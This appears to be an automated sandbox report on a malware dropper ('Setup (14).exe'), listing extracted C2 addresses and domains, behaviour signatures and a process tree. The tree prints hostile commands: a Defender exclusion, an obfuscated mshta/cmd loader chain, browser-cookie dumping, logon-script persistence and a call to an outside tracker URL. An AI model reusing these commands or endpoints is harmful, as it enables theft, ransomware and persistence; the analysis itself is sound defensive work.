Resubmissions
11-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 1029-08-2021 11:37
210829-18htk4slyj 1028-08-2021 23:10
210828-rt8b9gzxn6 1028-08-2021 22:59
210828-zxgnh5j4w6 1028-08-2021 11:31
210828-xrjs66aknj 10Analysis
-
max time kernel
1521s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
22-08-2021 22:39
General
-
Target
Setup (14).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Extracted
redline
22.08
95.181.172.100:55640
Extracted
redline
1
37.0.8.88:44263
Extracted
redline
v1
195.2.78.163:25450
Extracted
vidar
40.1
937
https://eduarroma.tumblr.com/
-
profile_id
937
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
Extracted
metasploit
windows/single_exec
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 9 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 12 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
Blocklisted process makes network request 64 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 34 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 14 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 16 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 39 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 58 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 5 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 27 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 32 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious behavior: SetClipboardViewer 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe2⤵
-
C:\Users\Admin\AppData\Roaming\trvsieaC:\Users\Admin\AppData\Roaming\trvsiea2⤵
-
C:\Users\Admin\AppData\Roaming\csvsieaC:\Users\Admin\AppData\Roaming\csvsiea2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\csvsieaC:\Users\Admin\AppData\Roaming\csvsiea3⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe2⤵
-
C:\Users\Admin\AppData\Roaming\trvsieaC:\Users\Admin\AppData\Roaming\trvsiea2⤵
-
C:\Users\Admin\AppData\Roaming\csvsieaC:\Users\Admin\AppData\Roaming\csvsiea2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\UQvCjtwlUUxmZrDhPkDuxaFf.exe"C:\Users\Admin\Documents\UQvCjtwlUUxmZrDhPkDuxaFf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\UQvCjtwlUUxmZrDhPkDuxaFf.exeC:\Users\Admin\Documents\UQvCjtwlUUxmZrDhPkDuxaFf.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\o363rXjAh1T_ZmFhEFWs6Pzs.exe"C:\Users\Admin\Documents\o363rXjAh1T_ZmFhEFWs6Pzs.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3740 -s 4843⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\vsopyRXgZgkE9Zio6_CdCi1x.exe"C:\Users\Admin\Documents\vsopyRXgZgkE9Zio6_CdCi1x.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\vsopyRXgZgkE9Zio6_CdCi1x.exe"C:\Users\Admin\Documents\vsopyRXgZgkE9Zio6_CdCi1x.exe" -q3⤵
-
C:\Users\Admin\Documents\wHIP5ak8pb1tTUGxW5Yx1CBf.exe"C:\Users\Admin\Documents\wHIP5ak8pb1tTUGxW5Yx1CBf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1264403.exe"C:\Users\Admin\AppData\Roaming\1264403.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1543961.exe"C:\Users\Admin\AppData\Roaming\1543961.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\5504337.exe"C:\Users\Admin\AppData\Roaming\5504337.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1630908.exe"C:\Users\Admin\AppData\Roaming\1630908.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\feLA63PGCsTi4c1lWRXrz6Eb.exe"C:\Users\Admin\Documents\feLA63PGCsTi4c1lWRXrz6Eb.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SIyCPL9G7jyLe7jAVnTopx1c.exe"C:\Users\Admin\Documents\SIyCPL9G7jyLe7jAVnTopx1c.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\Id0poKC1idN5W9bizinmQEVJ.exe"C:\Users\Admin\Documents\Id0poKC1idN5W9bizinmQEVJ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\HqeTzHZdh1KyjcFp4aA13tvd.exe"C:\Users\Admin\Documents\HqeTzHZdh1KyjcFp4aA13tvd.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\lGWWBHm3E8UplgySvQwCR8t4.exe"C:\Users\Admin\Documents\lGWWBHm3E8UplgySvQwCR8t4.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exe"C:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exeC:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exeC:\Users\Admin\Documents\54axPUQyoM5gSmQFRergm7g2.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\SN9Sg_s51ftsNuuNGj7g1rAT.exe"C:\Users\Admin\Documents\SN9Sg_s51ftsNuuNGj7g1rAT.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Documents\b0v0M5P14IL6HfhwtR78DYMR.exe"C:\Users\Admin\Documents\b0v0M5P14IL6HfhwtR78DYMR.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\MmdyuBaUmiqTtz3iycBqc_Ne.exe"C:\Users\Admin\Documents\MmdyuBaUmiqTtz3iycBqc_Ne.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\MmdyuBaUmiqTtz3iycBqc_Ne.exe"C:\Users\Admin\Documents\MmdyuBaUmiqTtz3iycBqc_Ne.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\l1cwCpgwAuhvwCl0y4f21XUm.exe"C:\Users\Admin\Documents\l1cwCpgwAuhvwCl0y4f21XUm.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\l1cwCpgwAuhvwCl0y4f21XUm.exe"C:\Users\Admin\Documents\l1cwCpgwAuhvwCl0y4f21XUm.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Documents\DXO_fwO41293rmBk4OLPHCT1.exe"C:\Users\Admin\Documents\DXO_fwO41293rmBk4OLPHCT1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\DXO_fwO41293rmBk4OLPHCT1.exeC:\Users\Admin\Documents\DXO_fwO41293rmBk4OLPHCT1.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\N50FBt3JXHAi6GsYH83Yg0NO.exe"C:\Users\Admin\Documents\N50FBt3JXHAi6GsYH83Yg0NO.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\2vjE50Tl27JNy_7vbQ35QdX4.exe"C:\Users\Admin\Documents\2vjE50Tl27JNy_7vbQ35QdX4.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\2vjE50Tl27JNy_7vbQ35QdX4.exe"C:\Users\Admin\Documents\2vjE50Tl27JNy_7vbQ35QdX4.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\PtyHRWTqRy0UITBsMkTArf_R.exe"C:\Users\Admin\Documents\PtyHRWTqRy0UITBsMkTArf_R.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\n3Xv5Z2LOb8T7SJHsSsOxLIZ.exe"C:\Users\Admin\Documents\n3Xv5Z2LOb8T7SJHsSsOxLIZ.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\N3XV5Z~1.DLL,s C:\Users\Admin\DOCUME~1\N3XV5Z~1.EXE3⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\N3XV5Z~1.DLL,mEVTeFJ3OXRK4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\N3XV5Z~1.DLL5⤵
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\N3XV5Z~1.DLL,UAZJQVhJUVI=5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318046⤵
-
C:\Windows\system32\ctfmon.exectfmon.exe7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpE745.tmp.ps1"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpC64F.tmp.ps1"5⤵
-
C:\Windows\SysWOW64\nslookup.exe"C:\Windows\system32\nslookup.exe" -type=any localhost6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\Documents\v_qlaPnF5evM3dXRBD0W35_I.exe"C:\Users\Admin\Documents\v_qlaPnF5evM3dXRBD0W35_I.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 16443⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\ed_7PPZS1byO0JAU7gy2jV_X.exe"C:\Users\Admin\Documents\ed_7PPZS1byO0JAU7gy2jV_X.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe"C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\9B7tRXdltAWK8R6StzopAF6q.exe" ) do taskkill -f -iM "%~NxA"4⤵
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "9B7tRXdltAWK8R6StzopAF6q.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\znjtUrbPv9Qu57ELNXIptXVT.exe"C:\Users\Admin\Documents\znjtUrbPv9Qu57ELNXIptXVT.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 6803⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 6763⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 6763⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 11683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 11203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 188 -s 11483⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\Z6X45YxttCTJi5IiQ4xPeFcp.exe"C:\Users\Admin\Documents\Z6X45YxttCTJi5IiQ4xPeFcp.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\ypc_aYtRkVH5vN8Wjb4PcQIC.exe"C:\Users\Admin\Documents\ypc_aYtRkVH5vN8Wjb4PcQIC.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-6MEJ9.tmp\ypc_aYtRkVH5vN8Wjb4PcQIC.tmp"C:\Users\Admin\AppData\Local\Temp\is-6MEJ9.tmp\ypc_aYtRkVH5vN8Wjb4PcQIC.tmp" /SL5="$30296,138429,56832,C:\Users\Admin\Documents\ypc_aYtRkVH5vN8Wjb4PcQIC.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-2VT2V.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2VT2V.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-OKBSF.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-OKBSF.tmp\Inlog.tmp" /SL5="$30274,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-25077.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-25077.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AHM15.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-AHM15.tmp\Setup.tmp" /SL5="$104C0,17352269,721408,C:\Users\Admin\AppData\Local\Temp\is-25077.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵
- Checks computer location settings
-
